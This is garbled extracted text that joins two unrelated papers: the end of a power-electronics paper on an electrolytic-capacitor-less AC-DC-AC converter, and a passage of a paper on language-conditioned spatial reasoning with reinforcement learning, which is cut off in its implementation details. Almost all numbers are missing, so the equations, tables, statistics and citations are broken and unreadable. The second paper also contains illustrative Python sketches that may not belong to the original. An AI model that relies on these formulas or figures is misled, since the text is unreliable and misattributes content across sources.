the phase-voltage, vs is the amplitude of the space voltage vector. the switching vector of the inverter up-arms is defined as (sa,sb,sc). when a-phase up-arm igbt is triggered and a- phase down-arm igbt will be closed, sa is equal to one. on the contrary, sa is equal to zero. the means of sb, and sc are consistent with sa. the output voltage vector of the converter can be signed vi(i= , , … , ). v and v are two zero vectors. another six vectors are nonzero vectors drawn in figure . the nonzero vectors are defined as the following. international journal of advanced network, monitoring and controls volume , no. , ( ) i j i dv u e    ,(i= , … ) ( ) in this equation, ud is the dc link voltage of the converter. the size of ud is set as the amplitude and ω t is set as the argument of a variable in another two-phase static coordinate system named α -β coordinate system. the track of ud is the envelope line shown in figure . in this coordinate system, zero time reference is set in the time that the amplitude of ud reaches the largest value. the angle between α and α is signed as θ, which indirectly reflexes the phase-difference of output voltage and input power source of the converter. the effective range of θ is between zero and one third π. figure . 
dc-link voltage and space voltage vector if the track of magneto-motive force generated by vs is rounded, the track of vs must also be rounded. the largest track of vs is the in-circle of the hexagon forming with six nonzero vectors shown in figure . so, the following formula can be reasoned. smax i v d v u  ( ) in this equation, smax v is the largest amplitude of vs. but dc link voltage of the novel converter is a six-pulse voltage, and the voltage changes between um/ and m u . so, the largest amplitude range of vs is shown as the following formula. ' m max m u v u s  ( ) in this equation, the cause of the maximum amplitude changing is the phase difference between input voltage and output voltage. that is to say the cause is θ. if θ is equal to π/ , vˊsmax will reach the maximum value. similarly, if θ is equal to zero, vˊsmax will reach the minimum value. so, the voltage conversation efficiency of the novel converter can be calculated by using ( ) and ( ) .   ( ) in conclusion, the voltage conversation efficiency of the novel converter is influenced by the phase difference of input voltage and output voltage, but the maximum efficiency is equal to the efficiency of the traditional converter. d. converter mathematics model when dc link voltage of the novel converter is six-pulse voltage, it will be calculated in the following equation. d a a b b c cu k u k u k u   ( ) in this equation, ka, kb and kc are the conversion function of the power-side rectifier shown in figure . they can be calculated by the following equation. , max( , , ) , min( , , ) max( , , ) , min( , , ) j a b c j a b c j a b c j a b c u u u u k u u u u u u u u u u u          ( ) in this equation, j is equal to a , b ,or c . for the novel converter, when ka is equal to one, kb is equal to negative one, kc is equal to zero and vi is equal to v or v , the equivalent circuit model of converter-motor system is shown in figure . the equivalent circuit in other switch states can also be acquired by the same methods. o o' + - + - + - ua ub uc + - ud ua ub o + - + - + - + - ud ua ub ua ub uc o' (a) (b) figure . inverter equivalent circuit supposing that an induction motor is fed by the novel converter. every phase voltage can be derived from the figure . in figure (a), three phase-voltages can be computed by using the following equation. a d b c d u u u u u         ( ) international journal of advanced network, monitoring and controls volume , no. , in figure (b), these voltages can be acquired in the following equation. a c d b d u u u u u         ( ) with the same method, three phase-voltages can be unified in one equation as the following. a a d b b cc u s u u s su                              ( ) math model of the novel converter can be acquired by using ( ) and ( ) as the following formula. ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) a a a b c b a b c b a b a c b b a c a c a b b b a cc c a b c a c b a c b c c a b c u k s s s k s s s u k s s s k s s s k s s s k s s su k s s s u k s s s u k s s s u                                                   ( ) in this equation, (ua,ub,uc) is the input voltage of the converter, (ua,ub,uc) is the output voltage of the converter, (ka, kb, kc )is the conversation function of the power-side rectifier and (sa,sb,sc) is the switch function of the load-side inverter. iii. simulation and analysis a. 
simulation of converter driving resistance-induction load simulation system is built to verify the performance of the novel converter. the converter drives a resistance- induction load, which is consisted of a resistance and a induction. the resistance is zero point five ohm and the induction is millihenry. the svpwm technology is used to control the load-side inverter of the converter and the switch frequency of the inverter is ten thousands hertz. input voltage of the converter is three hundred and eighty voltage. frequency of input voltage is fifty hertz. output voltage size is linearly acted in line with it’s the frequency. the parameter of film-capacitor is thirty three microfarad. the parameter of electrolytic capacitor of the traditional converter is four thousands and seven hundreds microfarad, which is developed by the target that wave voltage are less than five percent. simulation software is matlab r a. simulation algorithm is ode tb and maximum step is ten microsecond. θ showed in figure is one-sixth π. . . . . u d / v o lt (a) time /s . . . . u d / v o lt (b) time /s figure . contrast of dc-link voltage of two converters with resistance- inductance load the simulation results are shown in figure and table . figure (a) is the dc link voltage of the novel converter. corresponding to figure (a), figure (b) is the voltage of the traditional converter. when the frequency of output voltage changes from five hertz to fifteen hertz, thirty hertz and fifty hertz, the effective values of output voltage fundament component, the harmonic sizes and the maximum conversation efficiency are shown in table . table i. performance contrast of two converter with same load of resistance and inductance item frequency new converter traditional converter thd hz . . hz . . hz . . hz . . uab(v) hz . hz . hz . . hz . . η hz . . b. simulation of converter driving induction motor in order to further test the performance of the novel converter, an induction motor is driven by the novel converter and the traditional converter. vector control technology is employed in this converter-motor system. a break resistance is paralleled on dc link of the traditional converter. the parameters of two converters and simulation condition are identical as the previous. simulation results are shown in figure - and table . figure shows the speed response of a motor fed by above two converters. figure shows the dc link voltage of above two converters. figure shows the electromagnetic torque responses. when the frequency of the output voltage changes from five hertz to fifteen hertz, twenty five hertz and fifty hertz, the effective values of the output voltage fundament component, the harmonic sizes and the maximum conversation efficiency are shown in table . international journal of advanced network, monitoring and controls volume , no. , . . . . . r o to r s p e e d /r p m time /s figure . contrast of speeds of a motor fed by two converters with vector control (a) (b) figure . the dc link voltages of two converters with a motor load. (a) the novel. (b) the traditonal . . . . - - t/s is a /a novel converter traditional converter figure . stator current response of induction motor starting process table ii. performance contrast of two converters with a motor load item frequency new converter traditional converter thd (%) hz . . hz . . hz . . hz . . uab (v) hz . . hz . . hz . . hz . . η hz . . c. 
simulation tests about mathematic model some tests based on the mathematics model are intended to verify the veracity of the mathematical model of the novel converter. on the contrast, another tests based on the novel converter are further implemented, which is built by simpowersystem toolbox. testing condition is same. simulation results are shown in figure and table . figure (a) is the output line-voltage of the converter basing on the topology. on the contrast, figure (b) is the output line voltage of the converter based on mathematics model. fundamental wave effective value along with harmonic of output line voltage is shown as table . . . . . . . - u d/ vo lt (a) t/sec . . . . . . - u ab /v ol t (b) t/sec figure . output voltage of two models of converter. (a) the mathematical model. (b) the novel converter table iii. harmonic of output voltage of converter item frequency basing on the mathematic model basing the topology thd( %) hz . . hz . . hz . . uo hz . . hz . . hz . . d. the results analyzing figure shows that the voltages on dc link fit the expected voltages for two converters. figure (a) demonstrates that the dc link voltage of the novel converter is six-pulse wave voltage. figure (b) demonstrates that the dc link voltage of the traditional converter is an approximately constant dc voltage, whose ripple is less than five percent. figure shows that the rotor speed performance of an induction motor fed by the novel converter is same as the traditional. international journal of advanced network, monitoring and controls volume , no. , figure shows that the dynamic error of the dc link voltage of the novel converter driving an induction motor is smaller than the traditional. figure (a) demonstrates that the dc link voltage of the novel converter maintains six-pulse voltage. however, figure (b) demonstrates that the dc link voltage of the traditional converter has a larger error than the novel converter. figure shows that a-phase stator currents of an induction motor fed by two different converters have the same performance. data in table show that the maximum voltage conversion efficiency of the novel converter is equal to the traditional. the harmonic and the output voltage at different frequency of the novel is similar to the traditonal. data from table except the harmonic of the output voltage at fifty frequency show that the novel converter has the similar performance with the traditional. output voltage in figure and the data in table show that the mathematical model of the novel converter has the same performance with the novel converter. so the model is accurate. iv. conclusion the electrolytic capacitor-less ac-dc-ac converter proposed in this paper has the following characteristic. ( ) the novel topology is effective for driving an induction motor. ( ) the dc link voltage is a six-pulse voltage. ( ) the harmonic of the output voltage caused by the six- pulse voltage on dc link is similar to the traditional. ( ) the voltage conversation efficiencies of the novel converter feeding two different loads are equal to the traditional. ( ) simulation results show that the mathematics model of the novel converter is accurate and easy to build. acknowledgment this work was supported by china nature science foundation( ) references [ ] lu xiwei liu zhigang wang lei. estimate approach for fatigue damage of aluminum electrolytic capacitor based on accumulated damage theory[j]. transactions of china electro technical society, ,( ): - . doi: . /j.cnki. - .tces. . . 
[ ] niu, h., wang, s., ye, x., et al. “lifetime prediction of aluminum electrolytic capacitors in led drivers considering parameter shifts,” oct.vol.( - ), , - , doi: . /j.microrel. . . [ ] hadeed ahmed sher, khaled e. addoweesh, yasin khan. effect of short circuited dc link capacitor of an ac–dc–ac inverter on the performance of induction motor[j].journal of king saud university – engineering sciences, , : – . [ ] hadeed a shera, khaled e addoweesh, zorays khalid, etc. theoretical and experimental analysis of inverter fed induction motor system under dc link capacitor failure[j]. journal of king saud university- engineering sciences, , ( ): - . [ ] dai bin, zhao run-lin, shang dong-juan. research on output control of high-performance single-phase voltage-source inverters[j]. electrical measurement & instrumentation, , ( ): - .doi: - ( ) - - . [ ] h. luo, g.p. wu, q yin, “proportional-resonant control of a single- phase to three-phase converter without electrolytic capacitor,” proc. chinese automation congress(cac ), nov. , pp. - ,doi: . /cac. . [ ] zhang chenghui, li ke, du chunshui,etc. an energy-feedback control system of inverter based on phase and amplitude control[j]. transactions of china electrotechnical society, , ( ): - . doi: . /j.cnki. - .tces. . . [ ] hemalatha s, a. maheswari. direct ac-ac converter with high frequency link transformer using sinusoidal pwm technique[j]. south asian journal of engineering and technology vol. , no. ( ) – . [ ] kim joohn sheok, sul seung ki. new control scheme for ac-dc- ac converter without dc link electrolytic capacitor[j].ieee annual power electronics specialists conference, p - , [ ] c.c. hou, h.p. su, “multi-carrier pwm for ac-dc-ac converter without dc link electrolytic capacitor,” international power electronics conference(ipec-hiroshima-ecce asia ), may , pp. - , doi: . /ipec. . [ ] m.s. irfan, j.h. park, “power-decoupling of a multiport isolated converter for an electrolytic-capacitorless multilevel inverter,” ieee transactions on power electronics, , , ( ), pp. - . doi: . /tpel. . [ ] montie a. vitorino, luciano f. s. alves, f.m.p. italo roger, et al, “high-frequency pulsating dc-link three-phase inverter without electrolytic capacitor,” conf. proc. ieee appl. power electron. conf. expo.(apec ), march , pp. - , doi: . /apec. . [ ] lu yuan, hu binghui, zhang junwei ,etc. a three-segment algorithm research based on svpwm modulation[j]. power system protection and control, ,( ): - . [ ] zhou juan wei chen yang yu,etc. inverter simplified algorithm of pwm and inhibit common-mode voltage strategy[j]. transactions of china electro technical society, ,( ): - . 
representation learning for grounded spatial reasoning

michael janner, karthik narasimhan, and regina barzilay
computer science and artificial intelligence laboratory, massachusetts institute of technology
{janner, karthikn, regina}@csail.mit.edu

abstract

the interpretation of spatial references is highly contextual, requiring joint inference over both language and the environment. we consider the task of spatial reasoning in a simulated environment, where an agent can act and receive rewards. the proposed model learns a representation of the world steered by instruction text. this design allows for precise alignment of local neighborhoods with corresponding verbalizations, while also handling global references in the instructions.
we train our model with reinforcement learning using a variant of generalized value itera- tion. the model outperforms state-of-the-art approaches on several metrics, yielding a % reduction in goal localization error. introduction understanding spatial references in natural language is essential for successful human-robot communica- tion and autonomous navigation. this problem is challenging because interpretation of spatial refer- ences is highly context-dependent. for instance, the instruction “reach the cell above the westernmost rock” translates into different goal locations in the two environments shown in figure . therefore, to enable generalization to new, unseen worlds, the model must jointly reason over the instruction text and environment configuration. moreover, the rich- ness and flexibility in verbalizing spatial references further complicates interpretation of such instruc- tions. code and dataset are available at https://github. com/jannerm/spatial-reasoning reach the cell above the westernmost rock figure : sample d worlds and an instruction de- scribing a goal location. the optimal path from a common start position, denoted by a white dashed line, varies considerably with changes in the map layout. in this paper, we explore the problem of spa- tial reasoning in the context of interactive worlds. specifically, we assume access to a simulated envi- ronment, in which an agent can take actions to inter- act with the world and is rewarded for reaching the location specified by the language instruction. this feedback is the only source of supervision the model uses for interpreting spatial references. the key modeling task here is to induce a repre- sentation that closely ties environment observations and linguistic expressions. in prior work, this issue was addressed by learning representations for each modality and then combining them, for instance, with concatenation (misra et al., ). while this approach captures high-level correspondences be- tween instructions and maps, it does not encode de- transactions of the association for computational linguistics, vol. , pp. – , . action editor: hal daumé iii. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. tailed, lower-level mappings between specific posi- tions on the map and their descriptions. as our ex- periments demonstrate, combining the language and environment representations in a spatially localized manner yields significant performance gains on the task. to this end, our model uses the instruction text to drive the learning of the environment representation. we start by converting the instruction text into a real- valued vector using a recurrent neural network with lstm cells (hochreiter and schmidhuber, ). using this vector as a kernel in a convolution opera- tion, we obtain an instruction-conditioned represen- tation of the state. this allows the model to reason about immediate local neighborhoods in references such as “two cells to the left of the triangle”. we further augment this design to handle global refer- ences that involve information concerning the entire map (e.g. “the westernmost rock”). this is achieved by predicting a global value map using an additional component of the instruction representation. the en- tire model is trained with reinforcement learning us- ing the environmental reward signal as feedback. we conducted our experiments using a d virtual world as shown in figure . 
overall, we created over , tasks across maps, with instructions sourced from mechanical turk. we compare our model against two state-of-the-art systems adapted for our task (misra et al., ; schaul et al., ). the key findings of our experiments are threefold. first, our model can more precisely interpret instruc- tions than baseline models and find the goal location, yielding a % reduction in manhattan distance er- ror over the closest competitor. second, the model can robustly generalize across new, unseen map lay- outs. finally, we demonstrate that factorizing the instruction representation enables the model to sus- tain high performance when handling both local and global references. related work spatial reasoning in text this topic has attracted both theoretical and practical interest. from the lin- guistic and cognitive perspectives, research has fo- cused on the wide range of mechanisms that speak- ers use to express spatial relations (tenbrink, ; viethen and dale, ; byrne and johnson-laird, ; li and gleitman, ). the practical impli- cations of this research are related to autonomous navigation (moratz and tenbrink, ; levit and roy, ; tellex et al., ) and human-robot in- teraction (skubic et al., ). previous computational approaches include tech- niques such as proximity fields (kelleher et al., ), spatial templates (levit and roy, ) and geometrically defined mappings (moratz and ten- brink, ; kollar et al., ). more recent work in robotics has integrated text containing position in- formation with spatial models of the environment to obtain accurate maps for navigation (walter et al., ; hemachandra et al., ). most of these ap- proaches typically assume access to detailed geome- try or other forms of domain knowledge. in contrast to these knowledge-rich approaches, we are learn- ing spatial reference via interaction with the envi- ronment, acquiring knowledge of the environment in the process. instruction following spatial reasoning is a com- mon element in many papers on instruction follow- ing (macmahon et al., ; vogel and jurafsky, ; chen and mooney, ; artzi and zettle- moyer, ; kim and mooney, ; andreas and klein, ). as a source of supervision, these methods assume access to demonstrations, which specify the path corresponding with provided in- structions. in our setup, the agent is only driven by the final rewards when the goal is achieved. this weaker source of supervision motivates devel- opment of new techniques not considered in prior work. more recently, misra et al. ( ) proposed a neural architecture for jointly mapping instructions and visual observations (pixels) to actions in the environment. their model separately induces text and environment representations, which are concate- nated into a single vector that is used to output an action policy. while this representation captures coarse correspondences between the modalities, it doesn’t encode mappings at the level of local neigh- borhoods, negatively impacting performance on our task. universal value functions the idea of general- ized value functions has been explored before in schaul et al. ( ). the technique, termed uvfa, presents a clever trick of factorizing the value func- tion over states and goals using singular value de- composition (svd) and then learning a regression model to predict the low-rank vectors. this results in quick and effective generalization to all goals in the same state space. however, their work stops short of exploring generalization over map layouts, which our model is designed to handle. 
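as a concrete illustration of the factorization trick just described, the following minimal numpy sketch builds a toy value table over states and goals, factorizes it with a truncated svd, and reconstructs values from the low-rank factors; the sizes, rank, and random values are our own illustrative assumptions, not anything reported by schaul et al.

```python
import numpy as np

# illustrative sketch of the uvfa factorization idea: a table of values
# v[s, g] over states and goals is factorized with a truncated svd, and the
# two low-rank factors act as state and goal embeddings whose inner product
# reconstructs the value. all sizes and data here are made up.
rng = np.random.default_rng(0)
n_states, n_goals, rank = 100, 20, 8
v_table = rng.random((n_states, n_goals))      # stand-in for learned values

u, s, vt = np.linalg.svd(v_table, full_matrices=False)
state_emb = u[:, :rank] * s[:rank]             # low-rank state factors
goal_emb = vt[:rank, :].T                      # low-rank goal factors

v_hat = state_emb @ goal_emb.T                 # value estimate via dot products
print("mean reconstruction error:", np.abs(v_table - v_hat).mean())

# in the full uvfa, two regressors are then fit to map state features to
# state_emb and goal features to goal_emb, which is what enables quick
# generalization to unseen goals within the same state space.
```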
furthermore, our setup also involves specifying goals using natural language instructions, which is different from the coordinate-style specification used in that work. general framework task setup we model our task as a markov deci- sion process (mdp), where an autonomous agent is placed in an interactive environment with the capa- bility to choose actions that can affect the world. a goal is described in text, and rewards are available to the agent correspondingly. the mdp can be rep- resented by the tuple 〈s,a,x,t,r〉, where s is the set of all possible state configurations, a is the set of actions available to the agent, x is the set of all goal specifications in natural language, t(s′|s,a,x) is the transition distribution, and r(s,x) is the reward function. a state s ∈ s includes information such as the locations of different entities along with the agent’s own position. in this work, t is determin- istic in the environments considered; however, our methods also apply in the stochastic case. text instructions prior work has investigated hu- man usage of different types of referring expres- sions to describe spatial relations (levinson, ; viethen and dale, ). in order to build a ro- bust instruction following system, we examine sev- eral categories of spatial expressions that exhibit the wide range of natural language goal descriptions. specifically, we consider instructions that utilize ob- jects/entities present in the environment to describe a goal location. these instructions can be catego- rized into three groups: (a) text referring to a specific entity (e.g., “go to the circle”). (b) text specifying a location using a single refer- we will use the terms goal specifications and instructions interchangeably. ent entity (e.g., “reach the cell above the west- ernmost rock”). (c) text specifying a location using multiple refer- ent entities (e.g., “move to the goal two squares to the left of the heart and top right of house”). these three categories exemplify an increasing level of complexity, with the last one having multiple lev- els of indirection. in each category, we have both local and global references to objects. local references require an understanding of spatial prepositional phrases such as ‘above’, ‘in between’ and ‘next to’ in order to de- termine the precise goal location. this comprehen- sion is invariant to the global position of the object landmark(s) provided in the instruction. a global reference, on the other hand, contains superlatives such as ‘easternmost’ and ‘topmost’, which require reasoning over the entire map. for example, in the case of (a) above, a local reference would describe a unique object (e.g., “go to the circle”), whereas a global reference might require comparing the po- sitions of all objects of a specific type (e.g., “go to the northernmost tree”). a point to note is that we do not assume any ac- cess to mapping from instructions to objects or enti- ties in the worlds or a knowledge of spatial ontology – the system has to learn this entirely through feed- back from the environment. generalized value iteration learning to reach the goal while maximizing cumulative reward can be done by using a value function v (s) (sutton and barto, ) which represents the agent’s notion of expected future reward from state s. a popular al- gorithm to learn an optimal value function is value iteration (vi) (bellman, ), which uses the tech- nique of dynamic programming. in the standard bellman equation, the value func- tion is dependent solely on state. 
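as a point of reference for the goal-conditioned update introduced next, the following sketch runs standard value iteration on a small deterministic grid; the grid size, reward layout, goal cell, and discount factor are illustrative choices of ours, not values from the paper.

```python
import numpy as np

# standard value iteration on a toy deterministic grid. the grid size,
# reward values, and goal cell below are illustrative only.
H, W = 5, 5
goal = (4, 4)
gamma = 0.95
actions = [(-1, 0), (1, 0), (0, -1), (0, 1)]      # up, down, left, right

def reward(cell):
    return 1.0 if cell == goal else 0.0

V = np.zeros((H, W))
for _ in range(100):
    V_new = np.zeros_like(V)
    for i in range(H):
        for j in range(W):
            if (i, j) == goal:                    # treat the goal as terminal
                V_new[i, j] = reward((i, j))
                continue
            q_values = []
            for di, dj in actions:
                ni = min(max(i + di, 0), H - 1)   # clamp to stay on the grid
                nj = min(max(j + dj, 0), W - 1)
                q_values.append(reward((i, j)) + gamma * V[ni, nj])
            V_new[i, j] = max(q_values)
    if np.abs(V_new - V).max() < 1e-6:
        break
    V = V_new
```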
schaul et al. ( ) proposed a value function v(s, g) describing the expected reward from being in state s given goal g, capturing that state values are goal-dependent and that a single environment can offer many such goals. we also make use of such a generalized value function, although our goals are not observed directly as coordinate locations or states themselves but rather described in natural language (a local reference for a non-unique object would be ambiguous, of course). with x denoting a textual description of a goal, our vi update equations are:

q(s, a, x) = r(s, x) + γ ∑_{s′ ∈ s} t(s′ | s, a, x) · v(s′, x)
v(s, x) = max_a q(s, a, x)

where q is the action-value function, tracking the value of choosing action a in state s. once an optimal value function is learned, a straightforward action policy is:

π(s, x) = argmax_a q(s, a, x)

figure : a schematic depiction of our model. text instructions are represented as a vector h(t) and states as embeddings φ(s). a portion of the text representation is used as a convolutional kernel on φ(s), giving a text-conditioned local state representation z1. the remaining components are used as coefficients in a linear combination of gradient functions to give a global map-level representation z2. z1 and z2 are concatenated and input to a convolutional neural network to predict the final value map.

model
generalization over both environment configurations and text instructions requires a model that meets two desiderata. first, it must have a flexible representation of goals, one which can encode both the local structure and global spatial attributes inherent to natural language instructions. second, it must be compositional; the representation of language should be generalizable even though each unique instruction will only be observed with a single map during training. namely, the learned representation for a given instruction should still be useful even if the objects on a map are rearranged or the layout is changed entirely. to that end, our model combines the textual instructions with the map in a spatially localized manner, as opposed to prior work which joins goal representations and environment observations via simpler functions like an inner product (schaul et al., ). while our approach can more effectively learn local relations specified by language, it cannot naturally capture descriptions at the global environment level. to address this problem, we also use the language representation to predict coefficients for a basis set of gradient functions which can be combined to encode global spatial relations. more formally, inputs to our model (see figure ) consist of an environment observation s and textual description of a goal x. for simplicity, we will assume s to be a 2-d matrix, although the model can easily be extended to other input representations. we first convert s to a 3-d tensor by projecting each cell to a low-dimensional embedding (φ) as a function of the objects contained in that cell. in parallel, the text instruction x is passed through an lstm recurrent neural network (hochreiter and schmidhuber, ) to obtain a continuous vector representation h(x). this vector is then split into local and global components h(x) = [h1(x); h2(x)]. the local component, h1(x), is reshaped into a kernel to perform a convolution operation on the state embedding φ(s) (similar to chen et al.
( )): ( )z = ψ (φ(s); h (x)) meanwhile, the three-element global component algorithm training procedure : initialize experience memory d : initialize model parameters Θ : for epoch= ,m do : sample instruction x∈x and associated environ- ment e : predict value map v̂ (s,x;Θ) for all s∈e : choose start state s randomly : for t= ,n do : select at=argmax a ∑ s t(s|st− ,a)v̂ (s,x;Θ) : observe next state st and reward rt : store trajectory (s=s ,s ,...,r=r ,r ,...) in d : for j= ,j do : sample random trajectory (s,r) from d : perform gradient descent step on loss l(θ) h (x) is used to form the coefficients for a vertical and horizontal gradient along with a corresponding bias term. the gradients, denoted g and g in figure , are matrices of the same dimensionality as the state observation with values increasing down the rows and along the columns, respectively. the axis-aligned gradients are weighted by the elements of h (x) and summed to give a final global gradi- ent spanning the entire d space, analogous to how steerable filters can be constructed for any orienta- tion using a small set of basis filters (freeman and adelson, ): ( )z = h (x)[ ]·g +h (x)[ ]·g +h (x)[ ]·j in which j is the all-ones matrix also of the same dimensionality as the observed map. finally, the local and global information maps are concatenated into a single tensor, which is then pro- cessed by a convolutional neural network (cnn) with parameters θ to approximate the generalized value function: ( )v̂ (s,x) = ψ ([z ; z ]; θ) for every state s in the map. reinforcement learning given our model’s v̂ (s,x) predictions, the resulting policy (equa- tion ) can be enacted, giving a continuous trajectory of states {st,st+ , . . .} on a single map and their associated rewards {rt,rt+ , . . .} at each timestep note that we are referring to gradient filters here, not the gradient calculated during backpropagation in deep learning. t. we stored entire trajectories (as opposed to state transition pairs) in a replay memory d as described in mnih et al. ( ). the model is trained to pro- duce an accurate value estimate by minimizing the following objective: ( ) l(Θ) = es∼d [ v̂ (s,x; Θ) − ( r(s,x) + γ max a ∑ s′ t(s′|s,a)v̂ (s′,x; Θ−) )] where s is a state sampled from d, γ is the discount factor, Θ is the set of parameters of the entire model, and Θ− is the set of parameters of a target network copied periodically from our model. the complete training procedure is shown in algorithm . experimental setup puddle world navigation data in order to study generalization across a wide variety of environmen- tal conditions and linguistic inputs, we develop an extension of the puddle world reinforcement learn- ing benchmark (sutton, ; mankowitz et al., ). states in a × grid are first filled with ei- ther grass or water cells, such that the grass forms one connected component. we then populate the grass region with six unique objects which appear only once per map (triangle, star, diamond, circle, heart, and spade) and four non-unique objects (rock, tree, horse, and house) which can appear any num- ber of times on a given map. see figure for an example visualization. split local global train test table : overall statistics of our dataset. goal positions are chosen uniformly at random from the set of grass cells, encouraging the use of spatial references to describe goal locations which do not themselves contain a unique object. 
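before turning to the data collection, the following pytorch-style sketch summarizes the forward pass of the architecture described in the model section above: the instruction embedding is split into a convolutional kernel applied to the cell embeddings (the local representation) and three coefficients for the gradient basis (the global representation), and the two maps are concatenated and passed through a small cnn to predict a value map. all layer sizes, names, and the toy input at the end are our own assumptions and are smaller than the configuration reported in the implementation details.

```python
import torch
import torch.nn as nn
import torch.nn.functional as F

class InstructionValueMap(nn.Module):
    """illustrative sketch of the architecture described above; sizes are assumptions."""

    def __init__(self, vocab_size, word_dim=16, cell_feats=10, emb_dim=4, k=3):
        super().__init__()
        self.emb_dim, self.k = emb_dim, k
        text_dim = emb_dim * k * k + 3          # local kernel weights + 3 gradient coefficients
        self.words = nn.Embedding(vocab_size, word_dim)
        self.lstm = nn.LSTM(word_dim, text_dim, batch_first=True)
        self.cell_emb = nn.Linear(cell_feats, emb_dim)   # per-cell object indicators -> embedding
        self.cnn = nn.Sequential(
            nn.Conv2d(2, 16, 3, padding=1), nn.ReLU(),
            nn.Conv2d(16, 1, 3, padding=1),
        )

    def forward(self, instruction, grid):
        # instruction: (1, seq_len) word ids; grid: (h, w, cell_feats) object indicators
        h_x = self.lstm(self.words(instruction))[0][:, -1, :].squeeze(0)   # final lstm state
        h1, h2 = h_x[:-3], h_x[-3:]                                        # local / global split
        phi = self.cell_emb(grid).permute(2, 0, 1).unsqueeze(0)            # (1, emb_dim, h, w)
        kernel = h1.view(1, self.emb_dim, self.k, self.k)                  # text-conditioned kernel
        z1 = F.conv2d(phi, kernel, padding=self.k // 2)                    # local representation
        hh, ww = grid.shape[:2]
        g1 = torch.linspace(0, 1, hh).view(hh, 1).expand(hh, ww)           # vertical gradient
        g2 = torch.linspace(0, 1, ww).view(1, ww).expand(hh, ww)           # horizontal gradient
        z2 = (h2[0] * g1 + h2[1] * g2 + h2[2]).reshape(1, 1, hh, ww)       # global representation
        return self.cnn(torch.cat([z1, z2], dim=1)).squeeze()              # predicted value map

# usage with made-up data: a 6-word instruction over a 10x10 map
model = InstructionValueMap(vocab_size=50)
v_map = model(torch.randint(0, 50, (1, 6)), torch.rand(10, 10, 10))
```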
we used the mechanical turk crowdsourcing plat- form (buhrmester et al., ) to collect natural lan- guage descriptions of these goals. human annota- tors were asked to describe the positions of these • reach the horse below the rock and to the left of the green diamond • move to the square two below and one left of the star • go to the cell above the bottommost horse figure : example goal annotations collected with mechanical turk. goals using surrounding objects. at the end of each trial, we asked the same participants to provide goal locations given their own text instructions. this helped filter out a majority of instructions that were ambiguous or ill-specified. table provides some statistics on the data, and figure shows example annotations. in total, we collected instructions, ranging from to words in length, describing over maps. there are unique words in the annotated instructions. we do not perform any pre- processing on the raw annotations. it is plausible that a model designed to handle only local references could not handle global ones (consider our own model without the global gradi- ent maps). for clearer interpretation of results, we evaluate our model in two modes: trained and tested on local and global data separately, or as a combined dataset. while local instructions were obtained eas- ily, the global instructions were collected by design- ing a task in which only nonunique objects were pre- sented to the annotators. this precluded simple in- structions like “go left of the 〈object〉” because there would always be more than one of each object type. therefore, we obtained text with global properties (e.g. middle rock, leftmost tree) to sufficiently pin- point an object. on average, we collected unique local instructions and unique global instructions per map. to quantify the diversity of our dataset, we find the five nearest instructions in the training set for every instruction in the test set, as measured by edit distance (using the word as a unit) normalized by test instruction length. for each of these pairs, we also measure the manhattan distance between their corresponding goal locations. figure , which visu- the other objects were added back into the map after col- lecting the instruction. figure : a heatmap showing the normalized in- struction edit distance and goal manhattan distance corresponding to the most similar instructions be- tween the train and test set. for each instruction in the test set, we find the five most similar instructions in the training set. even for those instructions which are similar, the goal locations they describe can be far apart. alizes this analysis, underscores the difficulty of this task; even when two instructions are highly similar, they might correspond to entirely different target lo- cations. this is the case in the example in figure , which has a distance of four between the references goals. baselines we compare our model to the following baselines: uvfa (text) is a variant of the model described in (schaul et al., ) adapted for our task. the original model made use of two mlps to learn low dimensional embeddings of states and goals which were then combined via dot product to give value estimates. goals were represented either as (x,y) coordinates or as states themselves. as our goals are not observed directly but described in text, we replace the goal mlp with the same lstm as in our model. the state mlp has an identical architecture to that of the uvfa: two hidden layers of dimension and relu activations. 
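a minimal sketch of the uvfa (text) baseline just described is shown below: a two-hidden-layer relu mlp embeds the state, an lstm embeds the instruction, and the value estimate is their dot product. the dimensions and variable names are placeholders of ours rather than the exact configuration used in the experiments.

```python
import torch
import torch.nn as nn

class UVFAText(nn.Module):
    # illustrative sketch of the uvfa (text) baseline; sizes are placeholders
    def __init__(self, state_dim, vocab_size, hidden=128, embed=32):
        super().__init__()
        self.state_mlp = nn.Sequential(
            nn.Linear(state_dim, hidden), nn.ReLU(),
            nn.Linear(hidden, embed), nn.ReLU(),
        )
        self.words = nn.Embedding(vocab_size, 32)
        self.lstm = nn.LSTM(32, embed, batch_first=True)

    def forward(self, state, instruction):
        s = self.state_mlp(state)                          # (batch, embed) state embedding
        g = self.lstm(self.words(instruction))[0][:, -1]   # (batch, embed) goal embedding
        return (s * g).sum(dim=-1)                         # value estimate via dot product

# usage: a binary state vector and a tokenized instruction (both made up)
model = UVFAText(state_dim=1000, vocab_size=50)
value = model((torch.rand(1, 1000) > 0.5).float(), torch.randint(0, 50, (1, 6)))
```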
for consistency with the uvfa, we represent states as binary vectors denot- ing the presence of each type of object at every po- sition. cnn + lstm is a variant of the model described in misra et al. ( ), who developed it for a language-grounded block manipulation task. it first convolves the map layout to a low-dimensional rep- figure : reward achieved by our model and the two baselines on the training environments during re- inforcement learning on both local and global instructions. each epoch corresponds to simulation on goals, with a goal simulation terminating either when the agent reaches the goal state or has taken actions. resentation (as opposed to the mlp of the uvfa) and concatenates this to the lstm’s instruction em- bedding (as opposed to a dot product). these con- catenated representations are then input to a two- layer mlp. we also perform analysis to study the represen- tational power of our model, introducing two more comparison models: uvfa (pos) is the original uvfa model from (schaul et al., ), which we evaluate on our mod- ified puddle worlds to determine the difficulty of environment generalization independently from in- struction interpretation. our model (w/o gradient) is an ablation of our model without the global gradient maps, which allows us to determine the gradients’ role in representation-building. in additional to our reinforcement learning ex- periments, we train these models in a supervised setting to isolate the effects of architecture choices from other concerns inherent to reinforcement learn- ing algorithms. for this purpose, we constructed a dataset of ground-truth value maps for all human- annotated goals using value iteration. we use the models to predict value maps for the entire grid and minimize the mean squared error (mse) compared to the ground truth values: ( )l′(Θ) = ∑ (s,x) [v̂ (s,x; Θ) − v̄ (s,x)] . implementation details our model implementation uses an lstm with a learnable -dimensional embedding layer, hid- den units, -dimensional embeddings φ(s), and a x kernel applied to the embeddings, giving a di- mension of for h (t). the final cnn has layers of { , , , , , } channels, all with x kernels and padding of length such that the output value map prediction is equal in size to the input observa- tion. for each map, a reward of is given for reach- ing the correct goal specified by human annotation and a reward of − is given for falling in a puddle cell. the only terminal state is when the agent is at the goal. rewards are discounted by a factor of . . 